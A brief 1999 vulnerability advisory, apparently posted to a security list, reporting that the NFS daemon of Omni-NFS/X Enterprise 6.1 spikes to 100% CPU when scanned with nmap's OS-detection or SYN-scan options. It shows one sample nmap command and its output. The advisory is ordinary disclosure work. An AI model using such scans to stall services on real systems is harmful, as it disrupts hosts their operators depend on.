The nfs daemon (nfsd.exe) used by Omni-NFS/X will jump to 100% cpu usage if you scan it using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open)).
f571fadeb86f687031222c0868e94f400ac5c983834a352a42a5f98a3f441bed
Faulty software
---------------
Omni-NFS/X Enterprise version 6.1
Product
---------
Omni-NFS/X Enterprise is a X, NFS server solution for win32 systems.
It is written by XLink Technology ( http://www.xlink.com ) .
Vulnerability
-------------
The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage
if you scan it
using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) )
.
Example :
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007)
$ nmap -O -p 111 slacky
Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on slacky (192.168.1.2):
Port State Protocol Service
111 open tcp sunrpc
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=2 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98
Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008)
$
This was tested on Microsoft Windows NT 4.0 Workstation with SP5 .
I'm preaty sure all their NFS solutions are affected by this.
------------------------------------------------
Sacha Faust sfaust@isi-mtl.com
"He who despairs of the human condition is a coward, but he who has hope for
it is a fool. " - Albert Camus